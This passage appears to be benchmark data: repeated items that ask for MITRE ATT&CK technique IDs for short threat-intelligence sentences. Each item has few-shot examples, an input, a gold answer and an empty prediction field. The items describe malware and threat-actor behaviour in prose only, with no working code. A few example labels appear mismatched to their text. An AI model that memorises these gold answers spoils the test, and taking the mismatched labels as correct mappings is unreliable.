to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The legitimate DLL that would be used in this case has the size of roughly 600 KB, but here we have an obfuscated library that is over 600 MB. The large size of the file is intended to hamper analysis and detection. Once all empty sections have been removed from the library, the final payload is a binary of 27.5 MB\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n- Text: Clop has been packed to help avoid detection.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: TeamTNT has encrypted its binaries via AES and encoded files using Base64.\n\t - T1027: Obfuscated Files or Information\n", + "input": "A Night Dragon DLL included an XOR-encoded section.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: They routinely used standard tools that would mimic legitimate administrator activities. They relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools\n\t - T1021.004: Remote Services - SSH\n- Text: Once the attacker gained access to the network with compromised credentials, they moved laterally using multiple different credentials. The credentials used for lateral movement were always different from those used for remote access\n\t - T1078: Valid Accounts\n- Text: APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement\n\t - T1505.003: Server Software Component - Web Shell\n", + "input": "OilRig has used Putty to access compromised systems.", + "gold": "- T1021.004: Remote Services - SSH", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Octopus has compressed data before exfiltrating it using a tool called Abbrevia.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Proton zips up files before exfiltrating them.\n\t - T1560: Archive Collected Data\n- Text: menuPass has staged data on remote MSP systems or other victim networks prior to exfiltration.\n\t - T1074.002: Data Staged - Remote Data Staging\n", + "input": "APT29 used 7-Zip to compress stolen emails into password-protected archives prior to exfiltration.", + "gold": "- T1560.001: Archive Collected Data - Archive via Utility", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Otherwise, the malware bypasses UAC and escalates privileges with two different approaches \u2013 one for Windows 10 and the other for older versions\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: Tarrask leverages token theft to obtain `lsass.exe` security permissions.\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- Text: ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.\n\t - T1574: Hijack Execution Flow\n", + "input": "FinFisher performs UAC bypass.", + "gold": "- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: StrifeWater can send data and files from a compromised host to its C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: A SUGARDUMP variant used SMTP for C2.\n\t - T1071.003: Application Layer Protocol - Mail Protocols\n- Text: Empire has the ability to collect emails on a target system.\n\t - T1114.001: Email Collection - Local Email Collection\n", + "input": "Goopy has the ability to exfiltrate data over the Microsoft Outlook C2 channel.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BackConfig has the ability to use HTTPS for C2 communiations.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: communicates via ICMP for C2.\n\t - T1095: Non-Application Layer Protocol\n- Text: NOKKI has used FTP for C2 communications.\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n", + "input": "MarkiRAT can initiate communication over HTTP/HTTPS for its C2 server.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxShell can transfer files from a compromised host.\n\t - T1005: Data from Local System\n- Text: BRONZE UNION has also leveraged various web shells to collect and stage data for exfiltration. In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive\n\t - T1560.002: Archive Collected Data - Archive via Library\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1049: System Network Connections Discovery\n- Text: Lazarus Group has hosted malicious files on compromised as well as Lazarus Group-controlled servers.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "BADFLICK has uploaded files from victims' machines.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Frankenstein has used WMI queries to check if various security applications were running, including VMWare and Virtualbox.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.\n\t - T1082: System Information Discovery\n- Text: JPIN checks for the presence of certain security-related processes and deletes its installer/uninstaller component if it identifies any of them.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "Astaroth can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.", + "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: IcedID\u2019s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers\n\t - T1087.003: Account Discovery - Email Account\n- Text: In another engagement, we observed the adversary using Mimikatz (the official signed version) to access credentials for logon (T1003.001: LSASS Memory\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: NetPass.exe: a legitimate utility developed by NirSoft that recovers all network passwords stored on a system for the current logged-on user. This tool can also recover passwords stored in the credentials file of external drives. WebBrowserPassView: a password recovery tool that captures passwords stored by Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera and passes them to the credential enumerator module. Mail PassView: a password recovery tool that reveals passwords and account details for various email clients such as Microsoft Outlook, Windows Mail, Mozilla Thunderbird, Hotmail, Yahoo. Mail, and Gmail and passes them to the credential enumerator module. Once an available system is found, Emotet then writes the service component on the system, which writes Emotet onto the disk\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", + "input": "Emotet has been observed dropping browser password grabber modules.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used the `net` command to retrieve information about domain accounts.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: One interesting thing to note is that the Keybase account used by the attacker to chat with their victims has the same logo of the Pay2Key EOSIO smart contract system\n\t - T1585: Establish Accounts\n- Text: Fox Kitten has used a Twitter account to communicate with ransomware victims.\n\t - T1585.001: Establish Accounts - Social Media Accounts\n", + "input": "Fox Kitten has used the Softerra LDAP browser to browse documentation on service accounts.", + "gold": "- T1087.002: Account Discovery - Domain Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ROKRAT can modify the `HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\` registry key so it can bypass the VB object model (VBOM) on a compromised host.\n\t - T1112: Modify Registry\n- Text: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: Threat Group-3390 actors have used gsecdump to dump credentials. They have also dumped credentials from domain controllers.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n", + "input": "Dragonfly 2.0 modified the Registry to perform multiple techniques through the use of Reg.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bundlore uses the \"mktemp\" utility to make unique file and directory names for payloads, such as \"TMP_DIR=`mktemp -d -t x\".\n\t - T1564: Hide Artifacts\n- Text: It looks like GrowlHelper creates an executable named Software Update Check when it thinks it\u2019s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Dragonfly has used a scheduled task to execute a malicious file.\n\t - T1053: Scheduled Task/Job\n", + "input": "DarkWatchman has created a scheduled task for persistence.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Grandoreiro\u2019s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: Machete used multiple compiled Python scripts on the victim\u2019s system. Machete's main backdoor Machete is also written in Python.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: APT41 has configured payloads to load via LD_PRELOAD.\n\t - T1574.006: Hijack Execution Flow - Dynamic Linker Hijacking\n", + "input": "Ebury has used Python to implement its DGA.", + "gold": "- T1059.006: Command and Scripting Interpreter - Python", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 used batch scripts to enumerate administrators and users in the domain.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: Poseidon Group searches for administrator accounts on both the local victim machine and the network.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: The malware initializes by gathering system and malware filename information and creates a mutex to make sure only one instance of the Trojan executes on the system at a time. Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \u201c[username]=>singleton-instance-mutex\u201d. The Trojan then encrypts this MD5 hash using an XOR algorithm and the serial number of the storage volume. Kazuar uses the resulting ciphertext to generate a GUID that it appends to the string \u201cGlobal\\\\\u201d to create the mutex\n\t - T1087.001: Account Discovery - Local Account\n\t - T1082: System Information Discovery\n", + "input": "Dragonfly has used batch scripts to enumerate administrators and users in the domain.", + "gold": "- T1069.002: Permission Groups Discovery - Domain Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.\n\t - T1055: Process Injection\n- Text: Duqu is capable of loading executable code via process hollowing.\n\t - T1055.012: Process Injection - Process Hollowing\n- Text: InvisiMole has used ListPlanting to inject code into a trusted process.\n\t - T1055.015: Process Injection - ListPlanting\n", + "input": "Egregor can inject its payload into iexplore.exe process.", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy can sniff plaintext network credentials and use NBNS Spoofing to poison name services.\n\t - T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay\n- Text: DarkVishnya used network sniffing to obtain login data.\n\t - T1040: Network Sniffing\n- Text: APT41 performed password brute-force attacks on the local admin account.\n\t - T1110.002: Brute Force - Password Cracking\n", + "input": "Responder is used to poison name services to gather hashes and credentials from systems within a local network.", + "gold": "- T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mis-Type has used `cmd.exe` to run commands on a compromised host.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Commands passed as arguments into e.py were also seen being executed by the targeted Windows guest machine, running as a child process under vmtoolsd.exe. This execution chain can be seen in Figure 5. The parent binary /bin/rdt was not present on disk but was able to be recovered by dumping the processes memory of the ESXi hypervisor. The python script that sent out commands to the guest machines, e.py, was unable to be recovered.\n\t - T1202: Indirect Command Execution\n- Text: Anchor can create and execute services to load its payload.\n\t - T1569.002: System Services - Service Execution\n", + "input": "WastedLocker has used cmd to execute commands on the system.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used a script to collect information about the infected system.\n\t - T1119: Automated Collection\n- Text: QAKBOT abuses Wscript to execute a Jscript file.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1587.001: Develop Capabilities - Malware\n- Text: exfiltrates command output and collected files to its C2 server in 1500-byte blocks.\n\t - T1030: Data Transfer Size Limits\n", + "input": "Mythic supports scripting of file downloads from agents.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Motherboard Check The Trojan will perform the following WMI query: Select * from Win32_BaseBoard The Trojan will check the Manufacturer and Product fields in the results for the strings VMware, Virtual, VBox, VM or Oracle\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows. The exploit uses CVE-2015-1701 to execute a callback in userspace. The callback gets the EPROCESS structures of the current process and the System process, and copies data from the System token into the token of the current process. Upon completion, the payload continues execution in usermode with the privileges of the System process\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- Text: AADInternals can enumerate Azure AD users.\n\t - T1087.004: Account Discovery - Cloud Account\n", + "input": "CaddyWiper can obtain a list of current processes.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: jRAT has been distributed as HTA files with VBScript.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: No matching sample found for T1564.007\n- Text: Cobalt Strike has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.\n\t - T1137.001: Office Application Startup - Office Template Macros\n", + "input": "Bandook has used malicious VBA code against the target system.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lucifer can crash a debugger by passing a format string to \"OutputDebugStringA()\".\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n- Text: Static analysis of this executable shows only two functions, but a regular number of imports. Upon detecting a debugger attached to it, the malware will display the message below and terminate the execution. This packer also hides the calls to API functions. This time instead of using a dispatcher function, the malware pushes the arguments into the stack as usual but will then perform a call to a jump table built during the unpacking, in the .text section memory region. Each entry finishes with a jmp instruction into the respective API function. Effectively the malware doesn't do any call to API functions, it always performs a jump. The end result is the same has in the packer from 2016, but with a simpler mechanism. One of the anti-analysis features included in this packer is the lack of calls to API functions. In the early stages of execution, the malware loads the libraries and retrieves the addresses from functions it needs. Feature-wise, there is no change when compared with the 2016 version, in fact when compared the C2 beaconing functions even share some of the offsets\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "StoneDrill has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.", + "gold": "- T1497: Virtualization/Sandbox Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In october 2016 Group-IB published the report about the Cobalt group. Now, a year later, this group is continuing to attack banks, which is reported monthly by Group-IB's Threat Intelligence team. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The former module is installed on a system that has access to the Internet and provides interaction with the C&C server using HTTP/HTTPS/DNS protocols. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. For interaction on HTTPS protocol, HTTP protocol profiles may be used with an indicated SSL certificate, but for data exchange on the DNS protocol, it requires DNS A, AAAA, and TXT records. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers.\n\t - T1210: Exploitation of Remote Services\n- Text: HermeticWizard can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n", + "input": "zwShell has used RDP for lateral movement.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kessel has exfiltrated information gathered from the infected system to the C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: CharmPower can change its C2 channel once every 360 loops by retrieving a new domain from the actors\u2019 S3 bucket.\n\t - T1008: Fallback Channels\n- Text: This single hack of Volusion allows them to receive credit card data from 3,126 online shops. From the previous skimming attack on the British Airways and Newegg websites, we know that Group 6 tried to register the domains of the exfiltration server to be similar to the victims\u2019 domains. In this case, the domain of the exfiltration server is \u201cvolusion-cdn[.]com\u201d \u2014 very similar to the valid domain \u201ccdn3[.]volusion[.]com\u201d from Volusion. Both old and current skimmers are written with jQuery, serialize the stolen data, and use the jQuery.ajax function to POST data to a remote server. Although the older skimmer is much simpler compared to the current one, it didn\u2019t encode the stolen data or store the data in sessionStorage before the exfiltration\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Kevin can send data from the victim host through a DNS C2 channel.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: T9000 searches through connected drives for removable storage devices.\n\t - T1120: Peripheral Device Discovery\n- Text: FlawedAmmyy may obfuscate portions of the initial C2 handshake.\n\t - T1001: Data Obfuscation\n", + "input": "FunnyDream can check `Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings` to extract the `ProxyServer` string.", + "gold": "- T1012: Query Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has used VBScript to gather information about a victim machine.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: CHOPSTICK is capable of performing remote command execution.\n\t - T1059: Command and Scripting Interpreter\n- Text: Rising Sun can test a connection to a specified network IP address over a specified port number.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n", + "input": "During FunnyDream, the threat actors used a Visual Basic script to run remote commands.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used PowerShell to add and delete rules in the Windows firewall.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: HOPLIGHT has multiple proxy options that mask traffic between the malware and the remote operators.\n\t - T1090: Proxy\n- Text: No matching sample found for T1562.007\n", + "input": "TYPEFRAME can open the Windows Firewall on the victim\u2019s machine to allow incoming connections.", + "gold": "- T1562.004: Impair Defenses - Disable or Modify System Firewall", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. 